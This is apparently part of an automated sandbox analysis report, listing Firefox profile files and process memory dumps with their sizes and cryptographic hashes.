d9dba15f2dd79d7adef6949089149afe

SHA1
cfc7846cb8d857df5d07b775486c5a40af95f0d4

SHA256
17ac69b375b39963cfd4b04b0d5f977c80ef57ac86479efb140d9d7f30ad93bd

SHA512
1c6bb0aff98f870db12568cc4f54689ef5f3eebcf0093c311278db4b02a0ef84a9a1027f2f0b15e28976969a6e5bb4c6f674fc7cce938298c81ab23a5bf703f9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\illkw0pr.default-release\datareporting\glean\pending_pings\4e2f08c6-de6d-4dda-8011-ccadb88ae957

Filesize
25KB

MD5
ab48fed357dcc2ca753653efa11341f4

SHA1
5f7ca0a8af5dc964e2b31c22b8f02bf046185df2

SHA256
3caa39a60890779e95364f6995895ba148b600b09befa48401c672832a88dc80

SHA512
c29eee0fd313de4125e7e5fee9e44103f5817e37596ccb3cfc1cefa17290e2a35cea3e70653b6aaa5a66733eb674cae3414cb6a7cbe790ca00e7c44da9123c8b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\illkw0pr.default-release\datareporting\glean\pending_pings\8a6de5a5-b226-4e5f-8d1f-d2c0ba12e815

Filesize
671B

MD5
5db8a69670d09762e2e23a1b4dc62580

SHA1
8e97a47bcf48f9f0a9cf3e20df878946161ca92b

SHA256
8945f0e5318fe2255b092e73ef567e1d8fc04d07c864c8848ab2591598f891bc

SHA512
e6ab84acbb5555de560a0121b5287e5fe823e7feb62ca95d3e6bbbaebc1ea82135b92947dfa4a8cf515026c0789f910d72e371f6c5399a403c06004d8f7944ba

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\illkw0pr.default-release\datareporting\glean\pending_pings\a2f1097b-059f-4e44-afdb-f4a5ad1f802b

Filesize
982B

MD5
48daa4824a99f86e4a6dfac89d0a570c

SHA1
186ea5fe05b8c4e82a9f10ff98b55a9558a6f304

SHA256
aefe4823bc496f01a947dd9fb74fa99359b44ebc126b710cc11da49db0546968

SHA512
9c4a6a72998ae28936dc5696eb2d502d07733c4f4ec4096e5c2637da10de2ffa45188dc7bbf3c29113333bc402864ab853314c0a724e5f16d082461e0b996293

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\illkw0pr.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\illkw0pr.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\illkw0pr.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\illkw0pr.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\illkw0pr.default-release\places.sqlite

Filesize
5.0MB

MD5
da8d36675b156609ef863b5db4a6ccdc

SHA1
9c02835fb60920d188bbee3eb06392677304f624

SHA256
15e91aa5f0e1bb94f08d0c6352ef13afe2e075eb0c0d0ca39ed1932db7f52118

SHA512
c9ba2d5283cf1fbda5ce32f46ec09e126958c6a9fcdbff54ecbad0094a9355d347f5ed32cecf5eb572083f6f32f9e0b71c67b371c4a2843a57366c6de7d39ab8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\illkw0pr.default-release\places.sqlite-wal

Filesize
2.0MB

MD5
93d5acb2e618c33a2227710edc9eef4b

SHA1
e35e5d432be3333ec1addf59ef0f62689498f662

SHA256
7d49bdde67d2442f41975b5c34f8232cf0cae1d9c08420fd6c02c9a03fc9851b

SHA512
3eeea5902c17adb5ee00d087be4d811e190d9ed2e73bad4a86a08ff3cad41b06614017a511d3ce0574422e90bf7827bdf0c342729c65b13a04fd986775df40cd

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\illkw0pr.default-release\prefs-1.js

Filesize
11KB

MD5
8281285f47fbb84d6b2f4c1eaab49c49

SHA1
ba8908aa0372f2b7c00e0f2155d9e6f1a4a2d09f

SHA256
131dbe5c3ee05867eafac6f8dcab0e4a37ca0d5e1e988d3dbe8550e6859f7f09

SHA512
ce69d28892fd0b72b35516c359d94d8276149bdc82df70d7263c0593387f520b349014a84a806581b0693a4d6db66dc0edd863ae8e086ba237528f94c87d1cd0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\illkw0pr.default-release\prefs-1.js

Filesize
12KB

MD5
a2c7864696c2b5ae8adffdc6a34d086e

SHA1
00a73985b49b8fb86ce0c1f1477995d59f799e82

SHA256
253334cef74e6cc8efec22ae224ac030d5dbc597d38d35cbe9da1aa68a2718fc

SHA512
beecd195a28233ef69f7208f8f05d0444bf23fcb091a5152db28071884833dcfde496380652978d3eb85b66e091c3c9bb6aa6abe34569aa67e7fe85201a78401

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\illkw0pr.default-release\prefs.js

Filesize
11KB

MD5
3f081b45c3fcf79aaedea8ab405592bc

SHA1
f1eef850556908df25e2fd1e416584c8d5de05e9

SHA256
c73b645b8c8c8d0be0ac7c65aab024a262e5b12344fac4d4215c650b6914b999

SHA512
79c9ce72cf88cb437baae93002d930d4c301ee57a3a9846b21e54fc67daa717b22abd2d46b3ab2a03fc17ca55a009e7f37232d0e673c51d95b1ad40bae2e7765

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\illkw0pr.default-release\sessionstore-backups\recovery.baklz4

Filesize
2KB

MD5
a2ba78f945de6318ec9606f4f1e63745

SHA1
5dabd52540c8dda7260c6a21f9f191526ed817bf

SHA256
7482751d10bd5e62d865ddc540f13ca9ad7721eb71cf9e7bf493968662c0c23e

SHA512
64dcca1be1988a995801541c58c7b171633d7be52d25c07345e70456b7765c188c73e89e01a16f99dc195afb85fb0bd7263ee78146e5fc5ec89ef62df716a584

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\illkw0pr.default-release\sessionstore-backups\recovery.baklz4

Filesize
3KB

MD5
860c1b37818fb17316c31130e5daba82

SHA1
cb2559163a025629443aae504f64c0719d227593

SHA256
6a80d9eb53b5cfdbe7aabc2e09d88c760534049a99f82966822b33c7b2704598

SHA512
99e71723d057f3d473705814190d9eb365f395da917463a3fa839f6469820be52cc08eff5b7fb9b60203db1f6fdf1e969a6951ec73a139ef3604dedefc303cae

Download Submit
memory/984-1314-0x00007FF7A6A40000-0x00007FF7A7FD9000-memory.dmp

Filesize
21.6MB

Download
memory/984-1311-0x00007FF7A6A40000-0x00007FF7A7FD9000-memory.dmp

Filesize
21.6MB

Download
memory/984-1306-0x00007FF7A6A40000-0x00007FF7A7FD9000-memory.dmp

Filesize
21.6MB

Download
memory/1760-1163-0x00007FFA95A23000-0x00007FFA95A25000-memory.dmp

Filesize
8KB

Download
memory/1760-1164-0x0000018D10600000-0x0000018D10622000-memory.dmp

Filesize
136KB

Download
memory/1760-1174-0x00007FFA95A20000-0x00007FFA964E1000-memory.dmp

Filesize
10.8MB

Download
memory/1760-1175-0x00007FFA95A20000-0x00007FFA964E1000-memory.dmp

Filesize
10.8MB

Download
memory/1760-1178-0x00007FFA95A20000-0x00007FFA964E1000-memory.dmp

Filesize
10.8MB

Download
memory/2032-1203-0x00007FF68C150000-0x00007FF68DB6B000-memory.dmp

Filesize
26.1MB

Download
memory/2032-1214-0x00007FF68C150000-0x00007FF68DB6B000-memory.dmp

Filesize
26.1MB

Download
memory/2032-1206-0x00007FF68C150000-0x00007FF68DB6B000-memory.dmp

Filesize
26.1MB

Download
memory/4220-1330-0x0000000005D40000-0x0000000005D5E000-memory.dmp

Filesize
120KB

Download
memory/4220-1335-0x0000000008F50000-0x000000000947C000-memory.dmp

Filesize
5.2MB

Download
memory/4220-1441-0x0000000009740000-0x00000000097D2000-memory.dmp

Filesize
584KB

Download
memory/4220-1341-0x0000000004A30000-0x0000000004A42000-memory.dmp

Filesize
72KB

Download
memory/4220-1339-0x0000000009A30000-0x0000000009FD4000-memory.dmp

Filesize
5.6MB

Download
memory/4220-1338-0x0000000008AC0000-0x0000000008AE2000-memory.dmp

Filesize
136KB

Download
memory/4220-1337-0x0000000008B10000-0x0000000008BA6000-memory.dmp

Filesize
600KB

Download
memory/4220-1336-0x0000000008C20000-0x0000000008DE2000-memory.dmp

Filesize
1.8MB

Download
memory/4220-1334-0x0000000007370000-0x000000000737A000-memory.dmp

Filesize
40KB

Download
memory/4220-1333-0x0000000006290000-0x00000000062AA000-memory.dmp

Filesize
104KB

Download
memory/4220-1332-0x00000000073A0000-0x0000000007A1A000-memory.dmp

Filesize
6.5MB

Download
memory/4220-1315-0x0000000002740000-0x0000000002776000-memory.dmp

Filesize
216KB

Download
memory/4220-1316-0x0000000004E70000-0x0000000005498000-memory.dmp

Filesize
6.2MB

Download
memory/4220-1317-0x0000000004D20000-0x0000000004D42000-memory.dmp

Filesize
136KB

Download
memory/4220-1319-0x0000000005680000-0x00000000056E6000-memory.dmp

Filesize
408KB

Download
memory/4220-1318-0x0000000005610000-0x0000000005676000-memory.dmp

Filesize
408KB

Download
memory/4220-1329-0x0000000005730000-0x0000000005A84000-memory.dmp

Filesize
3.3MB

Download
memory/4220-1331-0x0000000005D90000-0x0000000005DDC000-memory.dmp

Filesize
304KB

Download
memory/4380-1313-0x0000000000D50000-0x0000000000D73000-memory.dmp

Filesize
140KB

Download
memory/4380-1312-0x0000000000D50000-0x0000000000D73000-memory.dmp

Filesize
140KB

Download
memory/4432-1233-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/4432-1226-0x0000000000C00000-0x0000000000E43000-memory.dmp

Filesize
2.3MB

Download
memory/4432-1227-0x0000000000C00000-0x0000000000E43000-memory.dmp

Filesize
2.3MB

Download
memory/4820-1217-0x0000000000570000-0x00000000005CD000-memory.dmp

Filesize
372KB

Download
memory/4820-1215-0x0000000000570000-0x00000000005CD000-memory.dmp

Filesize
372KB

Download
memory/4820-1213-0x0000000000570000-0x00000000005CD000-memory.dmp

Filesize
372KB

Download
memory/5468-1218-0x00007FF7CF5E0000-0x00007FF7D0F39000-memory.dmp

Filesize
25.3MB

Download
memory/5468-1221-0x00007FF7CF5E0000-0x00007FF7D0F39000-memory.dmp

Filesize
25.3MB

Download
memory/5468-1228-0x00007FF7CF5E0000-0x00007FF7D0F39000-memory.dmp

Filesize
25.3MB

Download